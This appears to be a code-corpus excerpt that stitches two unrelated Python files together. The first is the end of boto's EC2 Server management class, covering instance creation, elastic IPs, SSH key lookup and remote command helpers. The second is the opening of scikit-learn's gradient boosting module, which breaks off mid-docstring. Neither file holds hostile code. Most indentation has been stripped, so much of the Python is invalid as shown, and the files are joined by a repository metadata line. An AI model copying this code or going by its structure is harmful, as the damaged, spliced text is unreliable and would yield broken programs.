instance_type=params.get('instance_type'),
placement = zone,
user_data = cfg_fp.getvalue())
l = []
i = 0
elastic_ip = params.get('elastic_ip')
instances = reservation.instances
if elastic_ip is not None and instances.__len__() > 0:
instance = instances[0]
print('Waiting for instance to start so we can set its elastic IP address...')
# Sometimes we get a message from ec2 that says that the instance does not exist.
            # Hopefully the following delay will give ec2 enough time to get to a stable state:
time.sleep(5)
while instance.update() != 'running':
time.sleep(1)
instance.use_ip(elastic_ip)
print('set the elastic IP of the first instance to %s' % elastic_ip)
for instance in instances:
s = cls()
s.ec2 = ec2
            s.name = params.get('name') + ('' if i == 0 else str(i))
s.description = params.get('description')
s.region_name = region.name
s.instance_id = instance.id
if elastic_ip and i == 0:
s.elastic_ip = elastic_ip
s.put()
l.append(s)
i += 1
return l
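    # Illustrative sketch (hypothetical file name and values, not part of boto):
    # a minimal config passed to Server.create could carry an [EC2] section
    # whose options pre-fill the interactive prompts, e.g.
    #
    #   [EC2]
    #   instance_type = m1.small
    #   quantity = 1
    #
    #   servers = Server.create(config_file='my_server.cfg', name='web-1')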
@classmethod
def create_from_instance_id(cls, instance_id, name, description=''):
regions = boto.ec2.regions()
for region in regions:
ec2 = region.connect()
try:
rs = ec2.get_all_reservations([instance_id])
except:
rs = []
if len(rs) == 1:
s = cls()
s.ec2 = ec2
s.name = name
s.description = description
s.region_name = region.name
s.instance_id = instance_id
s._reservation = rs[0]
for instance in s._reservation.instances:
if instance.id == instance_id:
s._instance = instance
s.put()
return s
return None
@classmethod
def create_from_current_instances(cls):
servers = []
regions = boto.ec2.regions()
for region in regions:
ec2 = region.connect()
rs = ec2.get_all_reservations()
for reservation in rs:
for instance in reservation.instances:
try:
next(Server.find(instance_id=instance.id))
boto.log.info('Server for %s already exists' % instance.id)
except StopIteration:
s = cls()
s.ec2 = ec2
s.name = instance.id
s.region_name = region.name
s.instance_id = instance.id
s._reservation = reservation
s.put()
servers.append(s)
return servers
def __init__(self, id=None, **kw):
super(Server, self).__init__(id, **kw)
self.ssh_key_file = None
self.ec2 = None
self._cmdshell = None
self._reservation = None
self._instance = None
self._setup_ec2()
def _setup_ec2(self):
if self.ec2 and self._instance and self._reservation:
return
if self.id:
if self.region_name:
for region in boto.ec2.regions():
if region.name == self.region_name:
self.ec2 = region.connect()
if self.instance_id and not self._instance:
try:
rs = self.ec2.get_all_reservations([self.instance_id])
if len(rs) >= 1:
for instance in rs[0].instances:
if instance.id == self.instance_id:
self._reservation = rs[0]
self._instance = instance
except EC2ResponseError:
pass
def _status(self):
status = ''
if self._instance:
self._instance.update()
status = self._instance.state
return status
def _hostname(self):
hostname = ''
if self._instance:
hostname = self._instance.public_dns_name
return hostname
def _private_hostname(self):
hostname = ''
if self._instance:
hostname = self._instance.private_dns_name
return hostname
def _instance_type(self):
it = ''
if self._instance:
it = self._instance.instance_type
return it
def _launch_time(self):
lt = ''
if self._instance:
lt = self._instance.launch_time
return lt
def _console_output(self):
co = ''
if self._instance:
co = self._instance.get_console_output()
return co
def _groups(self):
gn = []
if self._reservation:
gn = self._reservation.groups
return gn
def _security_group(self):
groups = self._groups()
if len(groups) >= 1:
return groups[0].id
return ""
def _zone(self):
zone = None
if self._instance:
zone = self._instance.placement
return zone
def _key_name(self):
kn = None
if self._instance:
kn = self._instance.key_name
return kn
def put(self):
super(Server, self).put()
self._setup_ec2()
def delete(self):
if self.production:
raise ValueError("Can't delete a production server")
#self.stop()
super(Server, self).delete()
def stop(self):
if self.production:
raise ValueError("Can't delete a production server")
if self._instance:
self._instance.stop()
def terminate(self):
if self.production:
raise ValueError("Can't delete a production server")
if self._instance:
self._instance.terminate()
def reboot(self):
if self._instance:
self._instance.reboot()
def wait(self):
while self.status != 'running':
time.sleep(5)
def get_ssh_key_file(self):
if not self.ssh_key_file:
ssh_dir = os.path.expanduser('~/.ssh')
if os.path.isdir(ssh_dir):
ssh_file = os.path.join(ssh_dir, '%s.pem' % self.key_name)
if os.path.isfile(ssh_file):
self.ssh_key_file = ssh_file
if not self.ssh_key_file:
iobject = IObject()
self.ssh_key_file = iobject.get_filename('Path to OpenSSH Key file')
return self.ssh_key_file
def get_cmdshell(self):
if not self._cmdshell:
from boto.manage import cmdshell
self.get_ssh_key_file()
self._cmdshell = cmdshell.start(self)
return self._cmdshell
def reset_cmdshell(self):
self._cmdshell = None
def run(self, command):
with closing(self.get_cmdshell()) as cmd:
status = cmd.run(command)
return status
def get_bundler(self, uname='root'):
self.get_ssh_key_file()
return Bundler(self, uname)
def get_ssh_client(self, uname='root', ssh_pwd=None):
from boto.manage.cmdshell import SSHClient
self.get_ssh_key_file()
return SSHClient(self, uname=uname, ssh_pwd=ssh_pwd)
def install(self, pkg):
return self.run('apt-get -y install %s' % pkg)
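# Illustrative usage sketch (hypothetical instance id, not part of boto):
#
#   server = Server.create_from_instance_id('i-12345678', 'build-box')
#   server.wait()
#   status = server.run('uname -a')
#   server.install('git')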
|
schets/scikit-learn | refs/heads/master | sklearn/ensemble/gradient_boosting.py | 6 | """Gradient Boosted Regression Trees
This module contains methods for fitting gradient boosted regression trees for
both classification and regression.
The module structure is the following:
- The ``BaseGradientBoosting`` base class implements a common ``fit`` method
for all the estimators in the module. Regression and classification
only differ in the concrete ``LossFunction`` used.
- ``GradientBoostingClassifier`` implements gradient boosting for
classification problems.
- ``GradientBoostingRegressor`` implements gradient boosting for
regression problems.
"""
# Authors: Peter Prettenhofer, Scott White, Gilles Louppe, Emanuele Olivetti,
# Arnaud Joly
# License: BSD 3 clause
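# Illustrative usage sketch (hypothetical data, not part of this module):
#
#   from sklearn.ensemble import GradientBoostingClassifier
#   clf = GradientBoostingClassifier(n_estimators=100, learning_rate=0.1,
#                                    max_depth=3)
#   clf.fit(X_train, y_train)
#   predictions = clf.predict(X_test)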
from __future__ import print_function
from __future__ import division
from abc import ABCMeta, abstractmethod
from time import time
import numbers
import numpy as np
from scipy import stats
from .base import BaseEnsemble
from ..base import BaseEstimator
from ..base import ClassifierMixin
from ..base import RegressorMixin
from ..utils import check_random_state, check_array, check_X_y, column_or_1d
from ..utils import check_consistent_length, deprecated
from ..utils.extmath import logsumexp
from ..utils.fixes import expit, bincount
from ..utils.stats import _weighted_percentile
from ..utils.validation import check_is_fitted, NotFittedError
from ..externals import six
from ..feature_selection.from_model import _LearntSelectorMixin
from ..tree.tree import DecisionTreeRegressor
from ..tree._tree import DTYPE, TREE_LEAF
from ..tree._tree import PresortBestSplitter
from ..tree._tree import FriedmanMSE
from ._gradient_boosting import predict_stages
from ._gradient_boosting import predict_stage
from ._gradient_boosting import _random_sample_mask
class QuantileEstimator(BaseEstimator):
"""An estimator predicting the alpha-quantile of the training targets."""
def __init__(self, alpha=0.9):
if not 0 < alpha < 1.0:
raise ValueError("`alpha` must be in (0, 1.0) but was %r" % alpha)
self.alpha = alpha
def fit(self, X, y, sample_weight=None):
if sample_weight is None:
self.quantile = stats.scoreatpercentile(y, self.alpha * 100.0)
else:
self.quantile = _weighted_percentile(y, sample_weight, self.alpha * 100.0)
def predict(self, X):
check_is_fitted(self, 'quantile')
y = np.empty((X.shape[0], 1), dtype=np.float64)
y.fill(self.quantile)
return y
class MeanEstimator(BaseEstimator):
"""An estimator predicting the mean of the training targets."""
def fit(self, X, y, sample_weight=None):
if sample_weight is None:
self.mean = np.mean(y)
else:
self.mean = np.average(y, weights=sample_weight)
def predict(self, X):
check_is_fitted(self, 'mean')
y = np.empty((X.shape[0], 1), dtype=np.float64)
y.fill(self.mean)
return y
class LogOddsEstimator(BaseEstimator):
"""An estimator predicting the log odds ratio."""
scale = 1.0
def fit(self, X, y, sample_weight=None):
# pre-cond: pos, neg are encoded as 1, 0
if sample_weight is None:
pos = np.sum(y)
neg = y.shape[0] - pos
else:
pos = np.sum(sample_weight * y)
neg = np.sum(sample_weight * (1 - y))
if neg == 0 or pos == 0:
raise ValueError('y contains non binary labels.')
self.prior = self.scale * np.log(pos / neg)
def predict(self, X):
check_is_fitted(self, 'prior')
y = np.empty((X.shape[0], 1), dtype=np.float64)
y.fill(self.prior)
return y
class ScaledLogOddsEstimator(LogOddsEstimator):
"""Log odds ratio scaled by 0.5 -- for exponential loss. """
scale = 0.5
class PriorProbabilityEstimator(BaseEstimator):
"""An estimator predicting the probability of each
class in the training data.
"""
def fit(self, X, y, sample_weight=None):
if sample_weight is None:
sample_weight = np.ones_like(y, dtype=np.float64)
class_counts = bincount(y, weights=sample_weight)
self.priors = class_counts / class_counts.sum()
def predict(self, X):
check_is_fitted(self, 'priors')
y = np.empty((X.shape[0], self.priors.shape[0]), dtype=np.float64)
y[:] = self.priors
return y
class ZeroEstimator(BaseEstimator):
"""An estimator that simply predicts zero. """
def fit(self, X, y, sample_weight=None):
if np.issubdtype(y.dtype, int):
# classification
self.n_classes = np.unique(y).shape[0]
if self.n_classes == 2:
self.n_classes = 1
else:
# regression
self.n_classes = 1
def predict(self, X):
check_is_fitted(self, 'n_classes')
y = np.empty((X.shape[0], self.n_classes), dtype=np.float64)
y.fill(0.0)
return y
class LossFunction(six.with_metaclass(ABCMeta, object)):
"""Abstract base class for various loss functions.
Attributes
----------
K : int
The number of regression trees to be induced;
1 for regression and binary classification;
``n_classes`` for multi-class classification.
"""
is_multi_class = False
def __init__(self, n_classes):
self.K = n_classes
def init_estimator(self):
"""Default ``init`` estimator for loss function. """
raise NotImplementedError()
@abstractmethod
def __call__(self, y, pred, sample_weight=None):
"""Compute the loss of prediction ``pred`` and ``y``. """
@abstractmethod
def negative_gradient(self, y, y_pred, **kargs):
"""Compute the negative gradient.
Parameters
        ----------
y : np.ndarray, shape=(n,)
The target labels.
y_pred : np.ndarray, shape=(n,):
The predictions.
"""
def update_terminal_regions(self, tree, X, y, residual, y_pred,
sample_weight, sample_mask,
learning_rate=1.0, k=0):
"""Update the terminal regions (=leaves) of the given tree and
updates the current predictions of the model. Traverses tree
and invokes template method `_update_terminal_region`.
Parameters
----------
tree : tree.Tree
The tree object.
X : ndarray, shape=(n, m)
The data array.
y : ndarray, shape=(n,)
The target labels.
residual : ndarray, shape=(n,)
The residuals (usually the negative gradient).
y_pred : ndarray, shape=(n,)
The predictions.
sample_weight : ndarray, shape=(n,)
The weight of each sample.
sample_mask : ndarray, shape=(n,)
The sample mask to be used.
        learning_rate : float, default=1.0
learning rate shrinks the contribution of each tree by
``learning_rate``.
k : int, default 0
The index of the estimator being updated.
"""
# compute leaf for each sample in ``X``.
terminal_regions = tree.apply(X)
# mask all which are not in sample mask.
masked_terminal_regions = terminal_regions.copy()
masked_terminal_regions[~sample_mask] = -1
# update each leaf (= perform line search)
for leaf in np.where(tree.children_left == TREE_LEAF)[0]:
self._update_terminal_region(tree, masked_terminal_regions,
leaf, X, y, residual,
y_pred[:, k], sample_weight)
# update predictions (both in-bag and out-of-bag)
y_pred[:, k] += (learning_rate
* tree.value[:, 0, 0].take(terminal_regions, axis=0))
@abstractmethod
def _update_terminal_region(self, tree, terminal_regions, leaf, X, y,
residual, pred, sample_weight):
"""Template method for updating terminal regions (=leaves). """
class RegressionLossFunction(six.with_metaclass(ABCMeta, LossFunction)):
"""Base class for regression loss functions. """
def __init__(self, n_classes):
if n_classes != 1:
raise ValueError("``n_classes`` must be 1 for regression but "
"was %r" % n_classes)
super(RegressionLossFunction, self).__init__(n_classes)
class LeastSquaresError(RegressionLossFunction):
"""Loss function for least squares (LS) estimation.
    Terminal regions do not need to be updated for least squares. """
def init_estimator(self):
return MeanEstimator()
def __call__(self, y, pred, sample_weight=None):
if sample_weight is None:
return np.mean((y - pred.ravel()) ** 2.0)
else:
return (1.0 / sample_weight.sum() *
np.sum(sample_weight * ((y - pred.ravel()) ** 2.0)))
def negative_gradient(self, y, pred, **kargs):
return y - pred.ravel()
def update_terminal_regions(self, tree, X, y, residual, y_pred,
sample_weight, sample_mask,
learning_rate=1.0, k=0):
"""Least squares does not need to update terminal regions.
But it has to update the predictions.
"""
# update predictions
y_pred[:, k] += learning_rate * tree.predict(X).ravel()
def _update_terminal_region(self, tree, terminal_regions, leaf, X, y,
residual, pred, sample_weight):
pass
class LeastAbsoluteError(RegressionLossFunction):
"""Loss function for least absolute deviation (LAD) regression. """
def init_estimator(self):
return QuantileEstimator(alpha=0.5)
def __call__(self, y, pred, sample_weight=None):
if sample_weight is None:
return np.abs(y - pred.ravel()).mean()
else:
return (1.0 / sample_weight.sum() *
np.sum(sample_weight * np.abs(y - pred.ravel())))
def negative_gradient(self, y, pred, **kargs):
"""1.0 if y - pred > 0.0 else -1.0"""
pred = pred.ravel()
return 2.0 * (y - pred > 0.0) - 1.0
def _update_terminal_region(self, tree, terminal_regions, leaf, X, y,
residual, pred, sample_weight):
"""LAD updates terminal regions to median estimates. """
terminal_region = np.where(terminal_regions == leaf)[0]
sample_weight = sample_weight.take(terminal_region, axis=0)
diff = y.take(terminal_region, axis=0) - pred.take(terminal_region, axis=0)
tree.value[leaf, 0, 0] = _weighted_percentile(diff, sample_weight, percentile=50)
class HuberLossFunction(RegressionLossFunction):
"""Huber loss function for robust regression.
M-Regression proposed in Friedman 2001.
References
----------
J. Friedman, Greedy Function Approximation: A Gradient Boosting
Machine, The Annals of Statistics, Vol. 29, No. 5, 2001.
"""
def __init__(self, n_classes, alpha=0.9):
super(HuberLossFunction, self).__init__(n_classes)
self.alpha = alpha
self.gamma = None
def init_estimator(self):
return QuantileEstimator(alpha=0.5)
def __call__(self, y, pred, sample_weight=None):
pred = pred.ravel()
diff = y - pred
gamma = self.gamma
if gamma is None:
if sample_weight is None:
gamma = stats.scoreatpercentile(np.abs(diff), self.alpha * 100)
else:
gamma = _weighted_percentile(np.abs(diff), sample_weight, self.alpha * 100)
gamma_mask = np.abs(diff) <= gamma
if sample_weight is None:
sq_loss = np.sum(0.5 * diff[gamma_mask] ** 2.0)
lin_loss = np.sum(gamma * (np.abs(diff[~gamma_mask]) - gamma / 2.0))
loss = (sq_loss + lin_loss) / y.shape[0]
else:
sq_loss = np.sum(0.5 * sample_weight[gamma_mask] * diff[gamma_mask] ** 2.0)
lin_loss = np.sum(gamma * sample_weight[~gamma_mask] *
(np.abs(diff[~gamma_mask]) - gamma / 2.0))
loss = (sq_loss + lin_loss) / sample_weight.sum()
return loss
def negative_gradient(self, y, pred, sample_weight=None, **kargs):
pred = pred.ravel()
diff = y - pred
if sample_weight is None:
gamma = stats.scoreatpercentile(np.abs(diff), self.alpha * 100)
else:
gamma = _weighted_percentile(np.abs(diff), sample_weight, self.alpha * 100)
gamma_mask = np.abs(diff) <= gamma
residual = np.zeros((y.shape[0],), dtype=np.float64)
residual[gamma_mask] = diff[gamma_mask]
residual[~gamma_mask] = gamma * np.sign(diff[~gamma_mask])
self.gamma = gamma
return residual
def _update_terminal_region(self, tree, terminal_regions, leaf, X, y,
residual, pred, sample_weight):
terminal_region = np.where(terminal_regions == leaf)[0]
sample_weight = sample_weight.take(terminal_region, axis=0)
gamma = self.gamma
diff = (y.take(terminal_region, axis=0)
- pred.take(terminal_region, axis=0))
median = _weighted_percentile(diff, sample_weight, percentile=50)
diff_minus_median = diff - median
tree.value[leaf, 0] = median + np.mean(
np.sign(diff_minus_median) *
np.minimum(np.abs(diff_minus_median), gamma))
class QuantileLossFunction(RegressionLossFunction):
"""Loss function for quantile regression.
    Quantile regression allows estimating the percentiles
    of the conditional distribution of the target.
"""
def __init__(self, n_classes, alpha=0.9):
super(QuantileLossFunction, self).__init__(n_classes)
assert 0 < alpha < 1.0
self.alpha = alpha
self.percentile = alpha * 100.0
def init_estimator(self):
return QuantileEstimator(self.alpha)
def __call__(self, y, pred, sample_weight=None):
pred = pred.ravel()
diff = y - pred
alpha = self.alpha
mask = y > pred
if sample_weight is None:
loss = (alpha * diff[mask].sum() +
(1.0 - alpha) * diff[~mask].sum()) / y.shape[0]
else:
loss = ((alpha * np.sum(sample_weight[mask] * diff[mask]) +
(1.0 - alpha) * np.sum(sample_weight[~mask] * diff[~mask])) /
sample_weight.sum())
return loss
def negative_gradient(self, y, pred, **kargs):
alpha = self.alpha
pred = pred.ravel()
mask = y > pred
return (alpha * mask) - ((1.0 - alpha) * ~mask)
def _update_terminal_region(self, tree, terminal_regions, leaf, X, y,
residual, pred, sample_weight):
terminal_region = np.where(terminal_regions == leaf)[0]
diff = (y.take(terminal_region, axis=0)
- pred.take(terminal_region, axis=0))
sample_weight = sample_weight.take(terminal_region, axis=0)
val = _weighted_percentile(diff, sample_weight, self.percentile)
tree.value[leaf, 0] = val
class ClassificationLossFunction(six.with_metaclass(ABCMeta, LossFunction)):
"""Base class for classification loss functions. """
def _score_to_proba(self, score):
"""Template method to convert scores to probabilities.
        Loss functions that do not support probabilities raise a TypeError.
"""
raise TypeError('%s does not support predict_proba' % type(self).__name__)
@abstractmethod
def _score_to_decision(self, score):
"""Template method to convert scores to decisions.
Returns int arrays.
"""
class BinomialDeviance(ClassificationLossFunction):
"""Binomial deviance loss function for binary classification.
Binary classification is a special case; here, we only need to
fit one tree instead of ``n_classes`` trees.
"""
def __init__(self, n_classes):
if n_classes != 2:
raise ValueError("{0:s} requires 2 classes.".format(
self.__class__.__name__))
# we only need to fit one tree for binary clf.
super(BinomialDeviance, self).__init__(1)
def init_estimator(self):
return LogOddsEstimator()
def __call__(self, y, pred, sample_weight=None):
"""Compute the deviance (= 2 * negative log-likelihood). """
# logaddexp(0, v) == log(1.0 + exp(v))
pred = pred.ravel()
if sample_weight is None:
return -2.0 * np.mean((y * pred) - np.logaddexp(0.0, pred))
else:
return (-2.0 / sample_weight.sum() *
np.sum(sample_weight * ((y * pred) - np.logaddexp(0.0, pred))))
def negative_gradient(self, y, pred, **kargs):
"""Compute the residual (= negative gradient). """
return y - expit(pred.ravel())
def _update_terminal_region(self, tree, terminal_regions, leaf, X, y,
residual, pred, sample_weight):
"""Make a single Newton-Raphson step.
        Our node estimate is given by:
            sum(w * (y - prob)) / sum(w * prob * (1 - prob))
        We take advantage of the fact that y - prob = residual.
"""
terminal_region = np.where(terminal_regions == leaf)[0]
residual = residual.take(terminal_region, axis=0)
y = y.take(terminal_region, axis=0)
sample_weight = sample_weight.take(terminal_region, axis=0)
numerator = np.sum(sample_weight * residual)
denominator = np.sum(sample_weight * (y - residual) * (1 - y + residual))
if denominator == 0.0:
tree.value[leaf, 0, 0] = 0.0
else:
tree.value[leaf, 0, 0] = numerator / denominator
def _score_to_proba(self, score):
proba = np.ones((score.shape[0], 2), dtype=np.float64)
proba[:, 1] = 1.0 / (1.0 + np.exp(-score.ravel()))
proba[:, 0] -= proba[:, 1]
return proba
def _score_to_decision(self, score):
proba = self._score_to_proba(score)
return np.argmax(proba, axis=1)
class MultinomialDeviance(ClassificationLossFunction):
"""Multinomial deviance loss function for multi-class classification.
For multi-class classification we need to fit ``n_classes`` trees at
each stage.
"""
is_multi_class = True
def __init__(self, n_classes):
if n_classes < 3:
raise ValueError("{0:s} requires more than 2 classes.".format(
self.__class__.__name__))
super(MultinomialDeviance, self).__init__(n_classes)
def init_estimator(self):
return PriorProbabilityEstimator()
def __call__(self, y, pred, sample_weight=None):
# create one-hot label encoding
Y = np.zeros((y.shape[0], self.K), dtype=np.float64)
for k in range(self.K):
Y[:, k] = y == k
if sample_weight is None:
return np.sum(-1 * (Y * pred).sum(axis=1) +
logsumexp(pred, axis=1))
else:
return np.sum(-1 * sample_weight * (Y * pred).sum(axis=1) +
logsumexp(pred, axis=1))
def negative_gradient(self, y, pred, k=0, **kwargs):
"""Compute negative gradient for the ``k``-th class. """
return y - np.nan_to_num(np.exp(pred[:, k] -
logsumexp(pred, axis=1)))
def _update_terminal_region(self, tree, terminal_regions, leaf, X, y,
residual, pred, sample_weight):
"""Make a single Newton-Raphson step. """
terminal_region = np.where(terminal_regions == leaf)[0]
residual = residual.take(terminal_region, axis=0)
y = y.take(terminal_region, axis=0)
sample_weight = sample_weight.take(terminal_region, axis=0)
numerator = np.sum(sample_weight * residual)
numerator *= (self.K - 1) / self.K
denominator = np.sum(sample_weight * (y - residual) *
(1.0 - y + residual))
if denominator == 0.0:
tree.value[leaf, 0, 0] = 0.0
else:
tree.value[leaf, 0, 0] = numerator / denominator
def _score_to_proba(self, score):
return np.nan_to_num(
np.exp(score - (logsumexp(score, axis=1)[:, np.newaxis])))
def _score_to_decision(self, score):
proba = self._score_to_proba(score)
return np.argmax(proba, axis=1)
class ExponentialLoss(ClassificationLossFunction):
"""Exponential loss function for binary classification.
Same loss as AdaBoost.
References
----------
Greg Ridgeway, Generalized Boosted Models: A guide to the gbm package, 2007
"""
def __init__(self, n_classes):
if n_classes != 2:
raise ValueError("{0:s} requires 2 classes.".format(
self.__class__.__name__))
# we only need to fit one tree for binary clf.
super(ExponentialLoss, self).__init__(1)
def init_estimator(self):
return ScaledLogOddsEstimator()
def __call__(self, y, pred, sample_weight=None):
pred = pred.ravel()
if sample_weight is None:
return np.mean(np.exp(-(2. * y - 1.) * pred))
else:
return (1.0 / sample_weight.sum() *
np.sum(sample_weight * np.exp(-(2 * y - 1) * pred)))
def negative_gradient(self, y, pred, **kargs):
y_ = -(2. * y - 1.)
return y_ * np.exp(y_ * pred.ravel())
def _update_terminal_region(self, tree, terminal_regions, leaf, X, y,
residual, pred, sample_weight):
terminal_region = np.where(terminal_regions == leaf)[0]
pred = pred.take(terminal_region, axis=0)
y = y.take(terminal_region, axis=0)
sample_weight = sample_weight.take(terminal_region, axis=0)
y_ = 2. * y - 1.
numerator = np.sum(y_ * sample_weight * np.exp(-y_ * pred))
denominator = np.sum(sample_weight * np.exp(-y_ * pred))
if denominator == 0.0:
tree.value[leaf, 0, 0] = 0.0
else:
tree.value[leaf, 0, 0] = numerator / denominator
def _score_to_proba(self, score):
proba = np.ones((score.shape[0], 2), dtype=np.float64)
proba[:, 1] = 1.0 / (1.0 + np.exp(-2.0 * score.ravel()))
proba[:, 0] -= proba[:, 1]
return proba
def _score_to_decision(self, score):
return (score.ravel() >= 0.0).astype(np.int)
LOSS_FUNCTIONS = {'ls': LeastSquaresError,
'lad': LeastAbsoluteError,
'huber': HuberLossFunction,
'quantile': QuantileLossFunction,
'deviance': None, # for both, multinomial and binomial
'exponential': ExponentialLoss,
}
INIT_ESTIMATORS = {'zero': ZeroEstimator}
class VerboseReporter(object):
"""Reports verbose output to stdout.
    If ``verbose == 1``, output is printed once in a while (whenever the
    iteration is a multiple of ``verbose_mod``); if larger than 1, output is
    printed for each update.
"""
def __init__(self, verbose):
self.verbose = verbose
def init(self, est, begin_at_stage=0):
# header fields and line format str
header_fields = ['Iter', 'Train Loss']
verbose_fmt = ['{iter:>10d}', '{train_score:>16.4f}']
# do oob?
if est.subsample < 1:
header_fields.append('OOB Improve')
verbose_fmt.append('{oob_impr:>16.4f}')
header_fields.append('Remaining Time')
verbose_fmt.append('{remaining_time:>16s}')
# print the header line
print(('%10s ' + '%16s ' *
(len(header_fields) - 1)) % tuple(header_fields))
self.verbose_fmt = ' '.join(verbose_fmt)
        # print verbose info each time i % verbose_mod == 0
self.verbose_mod = 1
self.start_time = time()
self.begin_at_stage = begin_at_stage
def update(self, j, est):
"""Update reporter with new iteration. """
do_oob = est.subsample < 1
# we need to take into account if we fit additional estimators.
i = j - self.begin_at_stage # iteration relative to the start iter
if (i + 1) % self.verbose_mod == 0:
oob_impr = est.oob_improvement_[j] if do_oob else 0
remaining_time = ((est.n_estimators - (j + 1)) *
(time() - self.start_time) / float(i + 1))
if remaining_time > 60:
remaining_time = '{0:.2f}m'.format(remaining_time / 60.0)
else:
remaining_time = '{0:.2f}s'.format(remaining_time)
print(self.verbose_fmt.format(iter=j + 1,
train_score=est.train_score_[j],
oob_impr=oob_impr,
remaining_time=remaining_time))
if self.verbose == 1 and ((i + 1) // (self.verbose_mod * 10) > 0):
# adjust verbose frequency (powers of 10)
self.verbose_mod *= 10
class BaseGradientBoosting(six.with_metaclass(ABCMeta, BaseEnsemble,
_LearntSelectorMixin)):
"""Abstract base class for Gradient Boosting. """
@abstractmethod
def __init__(self, loss, learning_rate, n_estimators, min_samples_split,
min_samples_leaf, min_weight_fraction_leaf,
max_depth, init, subsample, max_features,
random_state, alpha=0.9, verbose=0, max_leaf_nodes=None,
warm_start=False):
self.n_estimators = n_estimators
self.learning_rate = learning_rate
self.loss = loss
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.subsample = subsample
self.max_features = max_features
self.max_depth = max_depth
self.init = init
self.random_state = random_state
self.alpha = alpha
self.verbose = verbose
self.max_leaf_nodes = max_leaf_nodes
self.warm_start = warm_start
self.estimators_ = np.empty((0, 0), dtype=np.object)
def _fit_stage(self, i, X, y, y_pred, sample_weight, sample_mask,
criterion, splitter, random_state):
"""Fit another stage of ``n_classes_`` trees to the boosting model. """
assert sample_mask.dtype == np.bool
loss = self.loss_
original_y = y
for k in range(loss.K):
if loss.is_multi_class:
y = np.array(original_y == k, dtype=np.float64)
residual = loss.negative_gradient(y, y_pred, k=k,
sample_weight=sample_weight)
# induce regression tree on residuals
tree = DecisionTreeRegressor(
criterion=criterion,
splitter=splitter,
max_depth=self.max_depth,
min_samples_split=self.min_samples_split,
min_samples_leaf=self.min_samples_leaf,
min_weight_fraction_leaf=self.min_weight_fraction_leaf,
max_features=self.max_features,
max_leaf_nodes=self.max_leaf_nodes,
random_state=random_state)
if self.subsample < 1.0:
# no inplace multiplication!
sample_weight = sample_weight * sample_mask.astype(np.float64)
tree.fit(X, residual, sample_weight=sample_weight,
check_input=False)
# update tree leaves
loss.update_terminal_regions(tree.tree_, X, y, residual, y_pred,
sample_weight, sample_mask,
self.learning_rate, k=k)
# add tree to ensemble
self.estimators_[i, k] = tree
return y_pred
def _check_params(self):
"""Check validity of parameters and raise ValueError if not valid. """
if self.n_estimators <= 0:
raise ValueError("n_estimators must be greater than 0 but "
"was %r" % self.n_estimators)
if self.learning_rate <= 0.0:
raise ValueError("learning_rate must be greater than 0 but "
"was %r" % self.learning_rate)
if (self.loss not in self._SUPPORTED_LOSS
or self.loss not in LOSS_FUNCTIONS):
raise ValueError("Loss '{0:s}' not supported. ".format(self.loss))
if self.loss == 'deviance':
loss_class = (MultinomialDeviance
if len(self.classes_) > 2
else BinomialDeviance)
else:
loss_class = LOSS_FUNCTIONS[self.loss]
if self.loss in ('huber', 'quantile'):
self.loss_ = loss_class(self.n_classes_, self.alpha)
else:
self.loss_ = loss_class(self.n_classes_)
if not (0.0 < self.subsample <= 1.0):
raise ValueError("subsample must be in (0,1] but "
"was %r" % self.subsample)
if self.init is not None:
if isinstance(self.init, six.string_types):
if self.init not in INIT_ESTIMATORS:
raise ValueError('init="%s" is not supported' % self.init)
else:
if (not hasattr(self.init, 'fit')
or not hasattr(self.init, 'predict')):
raise ValueError("init=%r must be valid BaseEstimator "
"and support both fit and "
"predict" % self.init)
if not (0.0 < self.alpha < 1.0):
raise ValueError("alpha must be in (0.0, 1.0) but "
"was %r" % self.alpha)
if isinstance(self.max_features, six.string_types):
if self.max_features == "auto":
# if is_classification
if self.n_classes_ > 1:
max_features = max(1, int(np.sqrt(self.n_features)))
else:
# is regression
max_features = self.n_features
elif self.max_features == "sqrt":
max_features = max(1, int(np.sqrt(self.n_features)))
elif self.max_features == "log2":
max_features = max(1, int(np.log2(self.n_features)))
else:
raise ValueError("Invalid value for max_features: %r. "
"Allowed string values are 'auto', 'sqrt' "
"or 'log2'." % self.max_features)
elif self.max_features is None:
max_features = self.n_features
elif isinstance(self.max_features, (numbers.Integral, np.integer)):
max_features = self.max_features
else: # float
if 0. < self.max_features <= 1.:
max_features = max(int(self.max_features * self.n_features), 1)
else:
raise ValueError("max_features must be in (0, n_features]")
self.max_features_ = max_features
def _init_state(self):
"""Initialize model state and allocate model state data structures. """
if self.init is None:
self.init_ = self.loss_.init_estimator()
elif isinstance(self.init, six.string_types):
self.init_ = INIT_ESTIMATORS[self.init]()
else:
self.init_ = self.init
self.estimators_ = np.empty((self.n_estimators, self.loss_.K),
dtype=np.object)
self.train_score_ = np.zeros((self.n_estimators,), dtype=np.float64)
# do oob?
if self.subsample < 1.0:
self.oob_improvement_ = np.zeros((self.n_estimators),
dtype=np.float64)
def _clear_state(self):
"""Clear the state of the gradient boosting model. """
if hasattr(self, 'estimators_'):
self.estimators_ = np.empty((0, 0), dtype=np.object)
if hasattr(self, 'train_score_'):
del self.train_score_
if hasattr(self, 'oob_improvement_'):
del self.oob_improvement_
if hasattr(self, 'init_'):
del self.init_
def _resize_state(self):
"""Add additional ``n_estimators`` entries to all attributes. """
# self.n_estimators is the number of additional est to fit
total_n_estimators = self.n_estimators
if total_n_estimators < self.estimators_.shape[0]:
raise ValueError('resize with smaller n_estimators %d < %d' %
                             (total_n_estimators, self.estimators_.shape[0]))
self.estimators_.resize((total_n_estimators, self.loss_.K))
self.train_score_.resize(total_n_estimators)
if (self.subsample < 1 or hasattr(self, 'oob_improvement_')):
# if do oob resize arrays or create new if not available
if hasattr(self, 'oob_improvement_'):
self.oob_improvement_.resize(total_n_estimators)
else:
self.oob_improvement_ = np.zeros((total_n_estimators,),
dtype=np.float64)
def _is_initialized(self):
return len(getattr(self, 'estimators_', [])) > 0
def fit(self, X, y, sample_weight=None, monitor=None):
"""Fit the gradient boosting model.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
y : array-like, shape = [n_samples]
Target values (integers in classification, real numbers in
regression)
For classification, labels must correspond to classes.
sample_weight : array-like, shape = [n_samples] or None
Sample weights. If None, then samples are equally weighted. Splits
that would create child nodes with net zero or negative weight are
ignored while searching for a split in each node. In the case of
classification, splits are also ignored if they would result in any
single class carrying a negative weight in either child node.
monitor : callable, optional
The monitor is called after each iteration with the current
